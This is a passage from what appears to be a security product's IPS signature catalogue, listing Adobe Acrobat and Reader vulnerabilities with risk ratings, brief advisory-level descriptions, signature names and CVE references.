File-PDF_Adobe-Acrobat-JPXDecode-Memory-Corruption

References:

CVE-2009-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3955

BID-37757
http://www.securityfocus.com/bid/37757

Adobe-Acrobat-Media-Newplayer-Code-Execution

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-272-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

There is a code execution vulnerability in Adobe Reader and Acrobat products. The vulnerability is caused by a use-after-free error when parsing crafted JavaScript calls to the media.newPlayer function. A remote attacker can exploit this vulnerability by enticing a user to download and view a malicious PDF file in a vulnerable version of the affected product.

Situation:

HTTP_SS-Adobe-Acrobat-Media-Newplayer-Code-Execution
File-PDF_Adobe-Acrobat-Media-Newplayer-Code-Execution

References:

CVE-2009-4324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324

BID-37331
http://www.securityfocus.com/bid/37331

OSVDB-60980
http://www.osvdb.org/60980

Adobe-Acrobat-Ocg-Setintent-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1051-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Integer Overflow

Description:

Improper validation of scripts in a PDF file causes an integer overflow vulnerability in Adobe Acrobat, which can be exploited to run arbitrary code on the target system.

Situation:

File-PDF_Adobe-Acrobat-Ocg-Setintent-Integer-Overflow

References:

CVE-2018-4910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4910

Adobe-Acrobat-PDF-Font-Processing-Memory-Corruption

About this vulnerability:

A buffer overflow vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-210-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

A memory corruption vulnerability exists in Adobe Reader and Acrobat products. The vulnerability is due to improper data validation when parsing crafted font data in PDF documents. Remote attackers could exploit this vulnerability by persuading the target users to open a malicious PDF document and execute arbitrary code. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. If the attack does not result in code execution, the affected application may terminate due to memory corruption.

Situation:

HTTP_SS-Adobe-Acrobat-Font-Processing-Memory-Corruption
File-PDF_Adobe-Acrobat-Font-Processing-Memory-Corruption

References:

CVE-2008-4813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4813

BID-32100
http://www.securityfocus.com/bid/32100

Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC (Classic)

Risk:

High

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in AcroForm.api, a component of Adobe Acrobat and Acrobat Reader. This vulnerability is due to improper validation of objects when processing forms. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted web page or document. Successful exploitation of this vulnerabilities could lead to arbitrary code execution under the security context of the user.

Situation:

File-PDF_Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free

References:

CVE-2019-8033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8033

Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free

About this vulnerability:

A vulnerability in Adobe System Acrobat Pro DC

Risk:

Moderate

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

Adobe Acrobat Pro

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Acrobat Pro. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free

References:

CVE-2020-24430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24430

Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Pro DC

Risk:

Moderate

First detected in:

sgpkg-ips-1297-5242

Last changed:

sgpkg-ips-1297-5242

Platform:

Generic

Software:

Adobe Acrobat Pro

Type:

Malfunction

Description:

An out-of-bounds read vulnerability has been reported in IA32.api, a component of Adobe Acrobat Pro DC. This vulnerability is due to a type confusion in WebPDF.api whereby a Unicode string is created as an ANSI string from a source Unicode string. The type confusion leads to the creation of an invalid Unicode string. An out of bounds read occurs when a Unicode string manipulation routine traverses the invalid Unicode string. A remote attacker could exploit the vulnerability by enticing an unsuspecting user to open a maliciously crafted PDF document. Successful exploitation would result in denial of service or information disclosure which may be leveraged to achieve remote code execution in the security context of the logged in user.

Situation:

File-PDF_Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read

References:

CVE-2020-24435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24435

Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

Moderate

First detected in:

sgpkg-ips-584-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Acrobat

Type:

Malfunction

Description:

A vulnerability in Adobe Acrobat

Situation:

File-Binary_Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529

References:

CVE-2014-0529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0529

BID-67362
http://www.securityfocus.com/bid/67362

Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058

About this vulnerability:

A vulnerability in Adobe Acrobat Pro

Risk:

Moderate

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat Pro

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Adobe Acrobat Pro.

Situation:

File-PDF_Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058

References:

CVE-2015-3058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3058

Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053

About this vulnerability:

A vulnerability in Adobe Acrobat Pro

Risk:

Moderate

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat Pro

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Adobe Acrobat Pro.

Situation:

File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053

References:

CVE-2015-3053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3053

Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054

About this vulnerability:

A vulnerability in Adobe Acrobat Pro

Risk:

Moderate

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat Pro

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Adobe Acrobat Pro.

Situation:

File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054

References:

CVE-2015-3054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3054

Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader

Risk:

High

First detected in:

sgpkg-ips-592-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Adobe Acrobat Reader's ActiveX plugin. The vulnerability is due to a use-after-free vulnerability while handling the messageHandler property. A remote attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web page. This can result in code execution in the context of the affected user.

Situation:

File-Text_Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free

References:

CVE-2014-0527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0527

BID-67367
http://www.securityfocus.com/bid/67367

OSVDB-106911
http://www.osvdb.org/106911

Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader DC

Risk:

Moderate

First detected in:

sgpkg-ips-1343-5242

Last changed:

sgpkg-ips-1343-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Input Validation

Description:

There exists an out-of-bounds read vulnerability in Adobe Acrobat Reader DC. Successful exploitation could lead in information disclosure and remote code execution.

Situation:

File-PDF_Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read

References:

CVE-2021-21042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21042

Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Acrobat Reader DC

Risk:

Moderate

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Annots.api, a component of Adobe Acrobat Reader DC. This vulnerability is due to an unchecked side-effect of handling events in the Annotations setProps method. An annotation object can be destroyed and subsequently re-accessed while setting its type property leading to use-after-free conditions. A remote attacker could exploit this vulnerability by enticing an unsuspecting user to open a maliciously crafted PDF document. Successful exploitation would result in arbitrary code execution in the security context of the logged in user.

Situation:

File-PDF_Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free

References:

CVE-2021-28550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28550

Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader

Risk:

High

First detected in:

sgpkg-ips-1370-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A use after free vulnerability has been reported in EScript.api, a component of Adobe Acrobat Reader DC. The vulnerability is due to improper handling of Thermometer objects in memory. A remote attacker could exploit this vulnerability by enticing a target user into opening a maliciously crafted PDF document. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-PDF_Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free

References:

CVE-2021-28640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28640

Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-1353-5242

Last changed:

sgpkg-ips-1353-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

An heap buffer overflow has been reported in Adobe Acrobat Reader DC. The vulnerability occurs while parsing embedded JPEG2000 stream in PDF files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in execution of arbitrary code under the security context of the target user.

Situation:

File-PDF_Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow

References:

CVE-2021-28560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28560

Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-1359-5242

Last changed:

sgpkg-ips-1359-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

An out of bounds read vulnerability has been reported in Adobe Acrobat Reader DC. The vulnerability is due to improper handling of relative paths in calls to the app.openDoc JavaScript function. A remote attacker could exploit this vulnerability by enticing a target user into opening a maliciously crafted PDF document. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-PDF_Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read

References:

CVE-2021-28554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28554

Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1371-5242

Last changed:

sgpkg-ips-1371-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A use after free vulnerability has been reported in AcroRd32.dll a component of Adobe Acrobat Reader DC. The vulnerability is due to incorrect handling of AVWinTextEditControl objects in memory when processing the WM_SETFOCUS message. A remote attacker can exploit this vulnerability be enticing an unsuspecting user to open and interact with a crafted PDF document. Successful exploitation could result in arbitrary code execution in the context of the AcroRd32.exe process.

Situation:

File-PDF_Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free

References:

CVE-2021-28639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28639

Adobe-Acrobat-Reader-Esobject-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2015

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A use after free vulnerability has been reported in the Adobe Acrobat and Acrobat Reader. This vulnerability is due to incorrect handling of ESObject data objects. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted web page or document. Successful exploitation of this vulnerability could lead to arbitrary code execution under the security context of the user.

Situation:

File-PDF_Adobe-Acrobat-Reader-Esobject-Use-After-Free

References:

CVE-2020-9715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9715

Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946

References:

CVE-2017-2946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2946

Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in the XSLT component of Adobe Reader and Adobe Acrobat. A remote attacker can use this to execute code on the affected system.

Situation:

File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949

References:

CVE-2017-2949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2949

Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Acrobat and Reader

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Acrobat; Adobe Reader

Type:

Integer Overflow

Description:

There is a code execution vulnerability in Adobe Acrobat and Reader products. The vulnerability is due to an integer overflow error in ACE.dll while parsing the mluc structure within ICC streams. As a result of the integer overflow, a smaller heap buffer is allocated which is subsequently overflowed. Remote attackers can exploit this vulnerability by enticing target users to open a crafted PDF file, and may possibly execute arbitrary code on the target system in the context of the current user.

Situation:

HTTP_SS-Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
File-PDF_Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow

References:

CVE-2010-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3622

BID-43729
http://www.securityfocus.com/bid/43729

Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected

Risk:

Moderate

First detected in:

sgpkg-ips-558-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Reader

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected

Situation:

File-PDF_Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352

References:

CVE-2013-3352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3352

Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC (Classic)

Risk:

Moderate

First detected in:

sgpkg-ips-825-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

There exists an out-of-bounds read vulnerability in Adobe Acrobat and Reader. A remote attacker can use this to access sensitive data.

Situation:

File-PDF_Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure

References:

CVE-2016-6941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6941

Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC (Classic)

Risk:

Moderate

First detected in:

sgpkg-ips-821-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper validation of the ihdr box in an embedded JPEG2000 image causes an information disclosure vulnerability in Adobe Acrobat and Acrobat Reader. A successful attack allows an attacker to extract sensitive information from the target system.

Situation:

File-PDF_Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure

References:

CVE-2016-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1078

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942

References:

CVE-2016-6942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6942

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970

References:

CVE-2016-6970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6970

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941

References:

CVE-2017-2941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2941

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960

References:

CVE-2017-2960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2960

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964

References:

CVE-2017-2964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2964

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-Binary_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965

References:

CVE-2017-2965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2965

Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957

References:

CVE-2016-6957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6957

Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958

References:

CVE-2016-6958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6958

Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution

About this vulnerability:

A vulnerability in Adobe Acrobat Reader for Unix

Risk:

Moderate

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Adobe Reader

Type:

Metacharacter

Description:

There is a vulnerability in the way Adobe Acrobat Reader validates a filename within the uudecode function. A specially crafted filename can allow an attacker to execute arbitrary programs with the privileges of the user that opened the malicious PDF document.

Situation:

E-Mail_BS-Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
File-TextId_Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution

References:

CVE-2004-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0630

BID-10931
http://www.securityfocus.com/bid/10931

Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948

References:

CVE-2017-2948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2948

Adobe-Acrobat-Reader-Toolbutton-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader

Risk:

High

First detected in:

sgpkg-ips-558-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader; Adobe Acrobat

Type:

Malfunction

Description:

A use after free vulnerability exists in Adobe Acrobat and Reader. The vulnerability is due to an error in the handling of callback functions associated with ToolButton objects. A remote attacker can exploit this vulnerability by enticing the user to open a specially crafted file. Successful exploitation could result in arbitrary code execution in the context of the currently affected user.

Situation:

File-PDF_Adobe-Acrobat-Reader-Toolbutton-Use-After-Free

References:

CVE-2013-3346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3346

BID-62149
http://www.securityfocus.com/bid/62149

OSVDB-96745
http://www.osvdb.org/96745

Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962

References:

CVE-2017-2962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2962

Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

An invalid array index vulnerability exists in Adobe Acrobat Reader that can allow arbitrary code execution.

Situation:

HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution

References:

CVE-2009-2990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2990

BID-36671
http://www.securityfocus.com/bid/36671

Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Adobe Acrobat Reader and Acrobat Professional products

Risk:

High

First detected in:

sgpkg-ips-263-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Adobe Acrobat Reader and Acrobat Professional products. A remote attacker can exploit this vulnerability by enticing a target user to open malformed PDF files.

Situation:

E-Mail_BS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption

References:

CVE-2009-2994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2994

BID-36638
http://www.securityfocus.com/bid/36638

OSVDB-58912
http://www.osvdb.org/58912

Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944

References:

CVE-2016-6944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6944

Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945

References:

CVE-2016-6945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6945

Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955

References:

CVE-2017-2955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2955

Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956

References:

CVE-2017-2956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2956

Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961

About this vulnerability:

A vulnerability in Adobe Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Acrobat Reader.

Situation:

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961

References:

CVE-2017-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2961

Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC

Risk:

High

First detected in:

sgpkg-ips-771-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Integer Overflow

Description:

A vulnerability in Adobe Acrobat Reader which allows remote attackers to execute arbitrary code, due to improper validation of the parameters for XFA FormCalc replace function.

Situation:

File-PDF_Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow

References:

CVE-2016-1043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1043

Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1105-5242

Last changed:
